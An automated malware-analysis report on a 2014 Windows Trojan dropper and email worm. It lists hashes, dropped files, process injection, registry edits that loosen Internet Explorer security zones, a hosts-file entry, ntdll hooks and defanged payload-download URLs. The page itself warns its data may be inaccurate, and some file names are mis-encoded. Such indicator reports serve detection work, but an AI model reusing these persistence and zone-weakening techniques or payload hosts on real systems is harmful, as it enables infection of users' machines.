Trojan.Crypt.CG_6ad50ea838

by malwarelabrobot on October 17th, 2014 in Malware Descriptions.

Trojan-Dropper.Win32.Agent.exc (Kaspersky), Trojan.Crypt.CG (B) (Emsisoft), Trojan.Crypt.CG (AdAware), mzpefinder_pcap_file.YR, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan, Worm, EmailWorm


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 6ad50ea838fbe4371dd28acf92999eb0
SHA1: 73dd9b7a3b7123679b163bfa9b84cdd8924fc46b
SHA256: d19774911f2545e18c919a335d625a591fc0a9aa4873ea97c3efacacd3c9880c
SSDeep: 49152:4uui0zc7iTcTv1XsYIGjnFtuRB0m2HjZZgEB4lG3X/t:4Kiw74IQRBE4EB4Q3F
Size: 2494274 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: VideoPerformer
Created at: 2007-04-26 09:56:30
Analyzed on: WindowsXPESX SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour Description
EmailWorm Worm can send e-mails.


Process activity

The Trojan creates the following process(es):

i.exe:1172
tqrl_90_4090.exe:1308
ws.exe:892
ignite.exe:428
ignite.exe:424
xtsszs_qn2.exe:540
SS540.exe:1688
%original file name%.exe:1660
xtsszs.exe:1484

The Trojan injects its code into the following process(es):

CF»Æ¹Ï͸ÊÓ¸¨Öúv5.6.exe:1324
ignite.exe:432
mankind.exe:528
svhost.exe:628
DL.exe:1984

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process i.exe:1172 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\19MJKZWM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\KK8ZCQNM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7b0.ini (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\NC09J4MH\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7b0\DL.exe (3944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\BindPlugIn[1].ini (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\DL[1].exe (6242 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\DL[1].exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\BindPlugIn[1].ini (0 bytes)

The process tqrl_90_4090.exe:1308 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\034Óê ÖÐÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÖÐÇï½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\toolbar_hover (3).png (531 bytes)
%Documents and Settings%\%current user%\Application Data\mmt.ico (881 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¶ùͯ½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\032Óê-СÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\huangli.xml (12024 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\´º½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\026Ñ©-´óÑ©.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\039Óê ±©Óêת´ó±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\½Ìʦ½Ú.png (545 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÆßϦ½Ú.png (930 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\01-Ò¹¼ä¶àÔÆ.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\023Ñ©-СѩתÖÐÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\052³¾ ɳ³¾±©.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\031Óê-Ò¹¼äÕóÓê .png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\input.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Ïû·ÑÕß.png (706 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÀͶ¯½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\setting.ini (208 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\md5dll.dll (8 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\027Ñ©-´óѩת±©Ñ©.png (2392 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¹úÇì½Ú.png (508 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Refresh_hover.png (680 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\³ýϦ.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\manual.exe (3616 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\00-Ò¹¼äÇç.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\tip.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\024Ñ©-ÖÐÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\053³¾ ³¬É³³¾±©.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\Inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\047ÒõÌì.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\050³¾ ¸¡³¾-ÐÂ.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\022Ñ©-Сѩ.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\021Ñ©-Ò¹¼äÕóÑ© .png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\tray_yes.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\723¼ÍÄî.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\yi.png (998 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\046Óê Óê¼ÐÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¶ËÎç½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Templates\16201410\YYM_955WD30.gif (930 bytes)
%Documents and Settings%\%current user%\Desktop\ÌìÆôÈÕÀú.lnk (909 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Ê¥µ®½Ú.png (873 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\Replace64.dll (3616 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸ß¿¼.png (555 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\Replace.dll (3312 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\028Ñ©-±©Ñ©.png (2392 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\ÌìÆôÈÕÀú\ÌìÆôÈÕÀú.lnk (921 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\set.ini (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB5.tmp (138023 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\043Óê ¶³Óê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uninst.exe (11048 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\time.dll (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\button_state5.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\Base64.dll (4 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\044Óê À×ÕóÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\035Óê ÖÐÓêת´óÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\NC09J4MH\tjapis[1].htm (89 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\NewIcons007.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\button_3b.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\041Óê ´ó±©Óêת³¬´ó±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÓÞÈ˽Ú.png (991 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÓÛÀ¼½Ú.png (913 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\Weather_none.png (11 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\021Ñ©-°×ÌìÕóÑ©.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\036Óê ´óÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\Math.dll (2392 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÇåÃ÷½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\city.txt (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸¾Å®½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸¸Ç×½Ú.png (846 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\button_3a.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\kindness.exe (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\tclock.ini (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\025Ñ©-ÖÐѩת´óÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ĸÇ×½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\045Óê À×ÕóÓê¼ÓÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¹â¹÷½Ú.png (536 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Refresh_normal.png (713 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ji.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÈÕÀú1.png (7192 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uTray.exe (5064 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\db2.mdb (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp (4 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÐÂÔö±¸Íü.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\tj.html (89 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\01-°×Ìì¶àÔÆ.png (1552 bytes)
%Documents and Settings%\%current user%\Desktop\.lnk (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\054Îí.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\tray_no.png (450 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\033Óê СÓêתÖÐÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\050³¾ ¸¡³¾.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÇéÈ˽Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\051³¾ Ñïɳ.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ddd.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\031Óê-°×ÌìÕóÓê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\037Óê ´óÓêת±©Óê.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\042Óê ³¬´ó±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\00-°×ÌìÇç.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Refresh_pushed.png (663 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\weathers.exe (38103 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÔªÏü½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸Ð¶÷½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\setting.ini (20 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\038Óê ±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ƽ°²Ò¹.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\db2.ldb (64 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\040Óê ´ó±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\ÌìÆôÈÕÀú\ÅäÖÃ\Uninstall.lnk (922 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\Base64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmB4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\tj.html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\Inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\Math.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\NSISdl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\success (0 bytes)

The process CF»Æ¹Ï͸ÊÓ¸¨Öúv5.6.exe:1324 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\dm.dll (3902 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SkinH_EL.dll (88 bytes)
%System%\regsvr32.exe (300 bytes)

The process ws.exe:892 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\svhost.exe (601 bytes)

The process ignite.exe:428 makes changes in the file system.
The Trojan deletes the following file(s):

%System%\config\systemprofile\Local Settings\Temp\~DF8DF7.tmp (0 bytes)

The process ignite.exe:432 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\tqrili\setting.ini (26 bytes)

The process ignite.exe:424 makes changes in the file system.
The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\~DF76C2.tmp (0 bytes)

The process xtsszs_qn2.exe:540 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsoB8.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SS540.exe (5873 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsoB8.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB8.tmp (0 bytes)

The process SS540.exe:1688 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\sszs\uninst.exe (3082 bytes)
%Program Files%\sszs\xtsszsup.exe (8421 bytes)
%Program Files%\sszs\xtsszs.exe (7861 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\系统瘦身助手\系统瘦身助手.lnk (650 bytes)
%Program Files%\sszs\xtsszs.dll (1568 bytes)
%Program Files%\sszs\mscomctl.ocx (21984 bytes)
%Documents and Settings%\%current user%\Desktop\系统瘦身助手.lnk (638 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\系统瘦身助手\卸载系统瘦身助手.lnk (479 bytes)
%System%\diactss.dll (40 bytes)
%System%\netsh.exe (692 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Desktop\系统瘦身助手.lnk (0 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\系统瘦身助手\卸载系统瘦身助手.lnk (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsuB9.tmp (0 bytes)
%Program Files%\sszs\xtsszs.dll (0 bytes)

The process %original file name%.exe:1660 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\i.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CF»Æ¹Ï͸ÊÓ¸¨Öúv5.6.exe (17629 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\opeB3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\opeB2.tmp (0 bytes)

The process svhost.exe:628 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\lpk.dll (601 bytes)
C:\RCXBA.tmp (16516 bytes)
%System%\hra33.dll (7 bytes)

The Trojan deletes the following file(s):

%System%\hra33.dll (0 bytes)

The process xtsszs.exe:1484 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\19MJKZWM\onlinefirst[1].gif (2 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\~DF246.tmp (0 bytes)

The process DL.exe:1984 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\xtsszs_qn2.exe (3915 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ws.exe (897 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cookies\index.dat (788 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cookies\[email protected][1].txt (139 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\NC09J4MH\ws[1].exe (13382 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\KK8ZCQNM\tqrl_90_4090[1].exe (601850 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\19MJKZWM\17048312[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\KK8ZCQNM\xtsszs_qn2[1].exe (138776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\icon_7[1].gif (922 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\NC09J4MH\y[1].txt (189 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cookies\[email protected][2].txt (293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\tj[1].htm (314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tqrl_90_4090.exe (20507 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013021120130218\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013030120130302\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013030120130302 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013021120130218 (0 bytes)

Registry activity

The process CF»Æ¹Ï͸ÊÓ¸¨Öúv5.6.exe:1324 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 D5 6E 19 7D A4 9C 9B 8D 34 11 39 46 B7 C8 7A"

The process %original file name%.exe:1660 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 43 66 F2 15 A7 7E 3F C7 97 91 B1 6D DE DC 3D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{5c14c4f6-74da-11e2-81b0-000c29ec7fc5}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"i.exe" = "i"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"CF»Æ¹Ï͸ÊÓ¸¨Öúv5.6.exe" = "易语言程序"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Dropped PE files

MD5 File path
90f713db031604705052fa33d384d013 c:\%original file name%.exe
ab8c30112e5118117354ffaccdb9b1b2 c:\Documents and Settings\"%CurrentUserName%"\Application Data\tqrili\Replace.dll
a87f0f76cdf059d9809f5401a81dcfc7 c:\Documents and Settings\"%CurrentUserName%"\Application Data\tqrili\Replace64.dll
5e732d5af0370a56a94bc00fa9df3d2f c:\Documents and Settings\"%CurrentUserName%"\Application Data\tqrili\ignite.exe
2433e87f0896c200c62f39d9a3917e11 c:\Documents and Settings\"%CurrentUserName%"\Application Data\tqrili\kindness.exe
1b25f550a1c853b1cd221bc5ddf2f823 c:\Documents and Settings\"%CurrentUserName%"\Application Data\tqrili\mankind.exe
7146dfa1e6aaca5924c4626731f96b70 c:\Documents and Settings\"%CurrentUserName%"\Application Data\tqrili\time.dll
ca1e89a61ecf3740067aff25920bb8ca c:\Documents and Settings\"%CurrentUserName%"\Application Data\tqrili\uTray.exe
b5b674a71f910d38972fb8b940104083 c:\Documents and Settings\"%CurrentUserName%"\Application Data\tqrili\uninst.exe
1ec9e3a5dd4525a9ee2b1ece8689be84 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\7b0\DL.exe
dcb19b6333cc5227526c9b2cd9c82ffe c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\CF»Æ¹Ï͸ÊÓ¸¨Öúv5.6.exe
4eb47ca672111bfd1e8cd09aef167992 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\SOFTWARE.LOG
eb6dba81f98d5c0ddff2104289ea7bd3 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\SS540.exe
147127382e001f495d1842ee7a9e7912 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\SkinH_EL.dll
430f63435575980f70192c4602af8f0b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Internet Files\Content.IE5\KK8ZCQNM\tqrl_90_4090[1].exe
eb6dba81f98d5c0ddff2104289ea7bd3 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Internet Files\Content.IE5\KK8ZCQNM\xtsszs_qn2[1].exe
6cee67311716bcacc2ea85e8bf422b63 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Internet Files\Content.IE5\NC09J4MH\ws[1].exe
a2206eb0d5510fc5fdbcf486ce2596a5 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\i.exe
430f63435575980f70192c4602af8f0b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\tqrl_90_4090.exe
eb6dba81f98d5c0ddff2104289ea7bd3 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\xtsszs_qn2.exe
714cf24fc19a20ae0dc701b48ded2cf6 c:\Program Files\sszs\mscomctl.ocx
e6d0ac8914358d21e3e5f89566c8ac3c c:\Program Files\sszs\uninst.exe
b7b2fe0e404e4fbbc4a10657ac3ab4e3 c:\Program Files\sszs\xtsszs.exe
c3f8abc1d2a6ff0ce3630f9d209e1213 c:\Program Files\sszs\xtsszsup.exe
cb86a1cbb9e089277f5cfb06f0524e30 c:\WINDOWS\system32\diactss.dll
e8889a55641fa57bcb588571f5bcbc63 c:\WINDOWS\system32\dm.dll
b4428e0a216fb5fc063a77c3562ccd2d c:\WINDOWS\system32\hra33.dll
4eb47ca672111bfd1e8cd09aef167992 c:\WINDOWS\system32\svhost.exe

HOSTS file anomalies

The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 734 bytes in size. The following strings are added to the hosts file listed below:

127.0.0.1 ZieF.pl


Rootkit activity

The Trojan installs the following user-mode hooks in ntdll.dll:

NtQueryInformationProcess
ZwOpenFile
NtCreateProcessEx
NtCreateProcess
NtCreateFile

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
SEC 4096 3608 1536 3.61819 5dd434da7f8bb065242d5c89668ae5e7
.rsrc 8192 2492226 2492226 5.4455 5a73a37fddcd1df11e88c5db8f120526

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://zw.cn170.com/tj.html 58.221.60.133
hxxp://zw.cn170.com/y.txt?6537536855 58.221.60.133
hxxp://js.users.51.la/17048312.js 113.107.42.34
hxxp://c06.i06.arnic.hadns.net/6/tqrl_90_4090.exe
hxxp://c06.i06.arnic.hadns.net/0815/help1.html
hxxp://www.meimotuan.com/ico.ico 114.215.202.132
hxxp://icon.ajiang.net/icon_7.gif 125.46.49.200
hxxp://dx5.3525.com/tjapis.php?mac=000C29EC7FC5&st=1&exez=tqrl_90_4090.exe&exef=DL.exe&pass=e4df6e48b09cbba7c493c1139b8aca47&url1=hxxp://ya.ru/&url2=hxxp://dasf.cn/
hxxp://xtsszs.oss-cn-hangzhou.aliyuncs.com/xtsszs_qn2.exe 42.120.230.9
hxxp://down.gtm.ucweb.com/pcbrowser/down.php?pid=4299
